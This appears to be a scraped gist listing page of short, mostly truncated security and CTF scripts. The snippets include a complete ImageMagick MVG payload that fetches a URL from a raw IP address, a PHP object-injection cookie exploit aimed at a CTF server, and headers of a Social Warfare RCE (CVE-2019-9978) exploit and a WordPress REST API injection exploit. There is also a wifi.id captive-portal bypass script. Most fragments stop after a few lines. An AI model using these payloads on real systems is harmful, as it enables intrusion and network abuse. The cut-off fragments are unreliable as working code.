This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
push graphic-context | |
viewbox 0 0 640 480 | |
fill 'url(http://103.200.7.150:8070/wew)' | |
pop graphic-context |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
# Date: March, 2019 | |
# Researcher: Luka Sikic | |
# Exploit Author: hash3liZer | |
# Download Link: https://wordpress.org/plugins/social-warfare/ | |
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
# Github: https://github.com/hash3liZer/CVE-2019-9978 | |
# Version: <=3D 3.5.2 | |
# CVE: CVE-2019-9978 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python | |
""" | |
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
Wordpress Version Affected: 4.7.0/4.7.1 | |
2017 - Coded by snoww0lf. | |
""" | |
import re |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import re | |
from urllib import quote_plus | |
def main(): | |
cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}') | |
url = "http://104.154.70.126:10888/" | |
req = requests.get(url, cookies=dict(todos=cookie)) | |
print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split(" "))+'}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import mechanize | |
import urllib | |
import urllib2 | |
import re | |
import json | |
def rand_gen_phone(): | |
phone = '081' | |
for i in range(9): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
@WIFI.ID BYPASS WITH PYTHON | |
Cara menggunakan: | |
- Install python. | |
- Install library mechanize. | |
- Jalankan dengan perintah: python namafile.py | |
- Tunggu dan silahkan mencoba untuk browsing. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Usage: python filename.py originalfile collisionfile | |
# snoww0lf | |
import sys | |
from hashlib import * | |
coll_find = [19, 45, 59, 83, 109, 123] | |
d_out = [] | |
def to_hex_conversion(data): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import string | |
cipher = "233 129 9 5 130 194 195 39 75 229" | |
def decode(): | |
flag = "" | |
strs = string.letters + "0123456789" + "{}_~*&^%$#@!()-" | |
to_list = ' '.join(strs).split(' ') | |
user_str = [] | |
for char in strs: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
HackDatKiwi CTF 2015 - Phone Lock 1 | |
""" | |
import hashlib | |
import random | |
salt = "abb6f243fb340025d312c2a41cfa8beb" | |
valid = "00a1e1072212ceae0445dcffde045da4" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def search(): | |
flag = '' | |
start = 'start.txt' | |
st = True | |
while st: | |
with open(start, 'r') as f: | |
x = f.readlines() | |
c = x[0] | |
start = c[6:].replace("\n", "") | |
print "Membaca file %s " % (start) |
NewerOlder